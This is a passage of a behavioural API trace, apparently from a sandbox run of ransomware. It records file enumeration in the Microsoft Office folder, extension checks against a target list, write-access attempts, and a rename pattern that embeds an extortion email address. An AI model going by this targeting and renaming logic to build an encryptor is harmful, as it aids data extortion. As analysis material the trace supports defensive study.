Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.428] lstrlenW (lpString=".doc") returned 4 [0315.428] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.428] lstrlenW (lpString=".docx") returned 5 [0315.428] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.428] lstrlenW (lpString=".pdf") returned 4 [0315.428] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.428] lstrlenW (lpString=".xls") returned 4 [0315.428] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.428] lstrlenW (lpString=".xlsx") returned 5 [0315.428] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.429] lstrlenW (lpString=".ppt") returned 4 [0315.429] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.429] lstrlenW (lpString=".zip") returned 4 [0315.429] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.429] lstrlenW (lpString=".rar") returned 4 [0315.429] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.429] lstrlenW (lpString=".bz2") returned 4 [0315.429] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.429] lstrlenW (lpString=".7z") returned 3 [0315.429] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.429] lstrlenW (lpString=".dbf") returned 4 [0315.429] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.429] lstrlenW (lpString=".1cd") returned 4 [0315.429] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.429] lstrlenW (lpString=".jpg") returned 4 [0315.429] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.429] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.429] lstrlenW (lpString=".doc") returned 4 [0315.429] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.429] lstrlenW (lpString=".docx") returned 5 [0315.430] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.430] lstrlenW (lpString=".pdf") returned 4 [0315.430] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.430] lstrlenW (lpString=".xls") returned 4 [0315.430] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.430] lstrlenW (lpString=".xlsx") returned 5 [0315.430] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.430] lstrlenW (lpString=".ppt") returned 4 [0315.430] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.430] lstrlenW (lpString=".zip") returned 4 [0315.430] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.430] lstrlenW (lpString=".rar") returned 4 [0315.430] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.430] lstrlenW (lpString=".bz2") returned 4 [0315.430] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.430] lstrlenW (lpString=".7z") returned 3 [0315.430] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.430] lstrlenW (lpString=".dbf") returned 4 [0315.430] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.430] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.430] lstrlenW (lpString=".1cd") returned 4 [0315.431] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-localization-l1-2-0.dll") returned 85 [0315.431] lstrlenW (lpString=".jpg") returned 4 [0315.431] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.431] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.431] lstrlenW (lpString="api-ms-win-core-processthreads-l1-1-1.dll") returned 41 [0315.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0315.433] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=19136) returned 1 [0315.433] CloseHandle (hObject=0x53c) returned 1 [0315.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x220 [0315.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.434] lstrlenW (lpString=".doc") returned 4 [0315.434] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.434] lstrlenW (lpString=".docx") returned 5 [0315.434] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0315.434] lstrlenW (lpString=".pdf") returned 4 [0315.434] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.434] lstrlenW (lpString=".xls") returned 4 [0315.434] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.434] lstrlenW (lpString=".xlsx") returned 5 [0315.434] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0315.434] lstrlenW (lpString=".ppt") returned 4 [0315.434] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.434] lstrlenW (lpString=".zip") returned 4 [0315.434] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.434] lstrlenW (lpString=".rar") returned 4 [0315.434] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.434] lstrlenW (lpString=".bz2") returned 4 [0315.434] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.434] lstrlenW (lpString=".7z") returned 3 [0315.434] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.434] lstrlenW (lpString=".dbf") returned 4 [0315.434] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.435] lstrlenW (lpString=".1cd") returned 4 [0315.435] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.435] lstrlenW (lpString=".jpg") returned 4 [0315.435] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.435] lstrlenW (lpString=".doc") returned 4 [0315.435] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.435] lstrlenW (lpString=".docx") returned 5 [0315.435] lstrcmpiW (lpString1=".docx", lpString2="1.dll") returned -1 [0315.435] lstrlenW (lpString=".pdf") returned 4 [0315.435] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.435] lstrlenW (lpString=".xls") returned 4 [0315.435] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.435] lstrlenW (lpString=".xlsx") returned 5 [0315.435] lstrcmpiW (lpString1=".xlsx", lpString2="1.dll") returned -1 [0315.435] lstrlenW (lpString=".ppt") returned 4 [0315.435] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.436] lstrlenW (lpString=".zip") returned 4 [0315.436] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.436] lstrlenW (lpString=".rar") returned 4 [0315.436] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.436] lstrlenW (lpString=".bz2") returned 4 [0315.436] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.436] lstrlenW (lpString=".7z") returned 3 [0315.436] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.436] lstrlenW (lpString=".dbf") returned 4 [0315.436] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.436] lstrlenW (lpString=".1cd") returned 4 [0315.436] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.436] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-processthreads-l1-1-1.dll") returned 87 [0315.436] lstrlenW (lpString=".jpg") returned 4 [0315.436] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.436] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.436] lstrlenW (lpString="api-ms-win-core-synch-l1-2-0.dll") returned 32 [0315.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0315.437] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=19136) returned 1 [0315.437] CloseHandle (hObject=0x53c) returned 1 [0315.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x220 [0315.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.438] lstrlenW (lpString=".doc") returned 4 [0315.438] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.438] lstrlenW (lpString=".docx") returned 5 [0315.438] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.438] lstrlenW (lpString=".pdf") returned 4 [0315.438] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.438] lstrlenW (lpString=".xls") returned 4 [0315.438] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.438] lstrlenW (lpString=".xlsx") returned 5 [0315.438] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.439] lstrlenW (lpString=".ppt") returned 4 [0315.439] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.439] lstrlenW (lpString=".zip") returned 4 [0315.439] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.439] lstrlenW (lpString=".rar") returned 4 [0315.439] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.439] lstrlenW (lpString=".bz2") returned 4 [0315.439] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.439] lstrlenW (lpString=".7z") returned 3 [0315.439] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.439] lstrlenW (lpString=".dbf") returned 4 [0315.439] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.439] lstrlenW (lpString=".1cd") returned 4 [0315.439] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.439] lstrlenW (lpString=".jpg") returned 4 [0315.439] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.439] lstrlenW (lpString=".doc") returned 4 [0315.439] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.439] lstrlenW (lpString=".docx") returned 5 [0315.440] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.440] lstrlenW (lpString=".pdf") returned 4 [0315.440] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.440] lstrlenW (lpString=".xls") returned 4 [0315.440] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.440] lstrlenW (lpString=".xlsx") returned 5 [0315.440] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.440] lstrlenW (lpString=".ppt") returned 4 [0315.440] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.440] lstrlenW (lpString=".zip") returned 4 [0315.440] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.440] lstrlenW (lpString=".rar") returned 4 [0315.440] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.440] lstrlenW (lpString=".bz2") returned 4 [0315.440] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.440] lstrlenW (lpString=".7z") returned 3 [0315.440] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.440] lstrlenW (lpString=".dbf") returned 4 [0315.440] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.440] lstrlenW (lpString=".1cd") returned 4 [0315.440] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-synch-l1-2-0.dll") returned 78 [0315.441] lstrlenW (lpString=".jpg") returned 4 [0315.441] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.441] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.441] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0315.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0315.442] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=18624) returned 1 [0315.442] CloseHandle (hObject=0x53c) returned 1 [0315.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x220 [0315.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.443] lstrlenW (lpString=".doc") returned 4 [0315.443] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.443] lstrlenW (lpString=".docx") returned 5 [0315.443] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.443] lstrlenW (lpString=".pdf") returned 4 [0315.443] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.443] lstrlenW (lpString=".xls") returned 4 [0315.443] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.444] lstrlenW (lpString=".xlsx") returned 5 [0315.444] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.444] lstrlenW (lpString=".ppt") returned 4 [0315.444] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.444] lstrlenW (lpString=".zip") returned 4 [0315.444] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.444] lstrlenW (lpString=".rar") returned 4 [0315.444] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.444] lstrlenW (lpString=".bz2") returned 4 [0315.444] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.444] lstrlenW (lpString=".7z") returned 3 [0315.444] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.444] lstrlenW (lpString=".dbf") returned 4 [0315.444] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.444] lstrlenW (lpString=".1cd") returned 4 [0315.444] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.444] lstrlenW (lpString=".jpg") returned 4 [0315.444] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.444] lstrlenW (lpString=".doc") returned 4 [0315.445] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.445] lstrlenW (lpString=".docx") returned 5 [0315.445] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.445] lstrlenW (lpString=".pdf") returned 4 [0315.445] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.445] lstrlenW (lpString=".xls") returned 4 [0315.445] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.445] lstrlenW (lpString=".xlsx") returned 5 [0315.445] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.445] lstrlenW (lpString=".ppt") returned 4 [0315.445] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.445] lstrlenW (lpString=".zip") returned 4 [0315.445] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.445] lstrlenW (lpString=".rar") returned 4 [0315.445] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.445] lstrlenW (lpString=".bz2") returned 4 [0315.445] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.445] lstrlenW (lpString=".7z") returned 3 [0315.445] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0315.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.445] lstrlenW (lpString=".dbf") returned 4 [0315.445] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0315.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.445] lstrlenW (lpString=".1cd") returned 4 [0315.445] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0315.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-timezone-l1-1-0.dll") returned 81 [0315.446] lstrlenW (lpString=".jpg") returned 4 [0315.446] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0315.446] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0315.446] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0315.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53c [0315.447] GetFileSizeEx (in: hFile=0x53c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=11616) returned 1 [0315.447] CloseHandle (hObject=0x53c) returned 1 [0315.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x220 [0315.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0315.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0315.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.448] lstrlenW (lpString=".doc") returned 4 [0315.448] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0315.448] lstrlenW (lpString=".docx") returned 5 [0315.448] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0315.448] lstrlenW (lpString=".pdf") returned 4 [0315.448] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0315.448] lstrlenW (lpString=".xls") returned 4 [0315.448] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0315.448] lstrlenW (lpString=".xlsx") returned 5 [0315.448] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0315.448] lstrlenW (lpString=".ppt") returned 4 [0315.448] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0315.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 79 [0315.449] lstrlenW (lpString=".zip") returned 4 [0315.449] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0315.449] lstrlenW (lpString=".rar") returned 4 [0315.449] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0315.449] lstrlenW (lpString=".bz2") returned 4 [0315.449] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0315.449] lstrlenW (lpString=".7z") returned 3 [0315.449] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 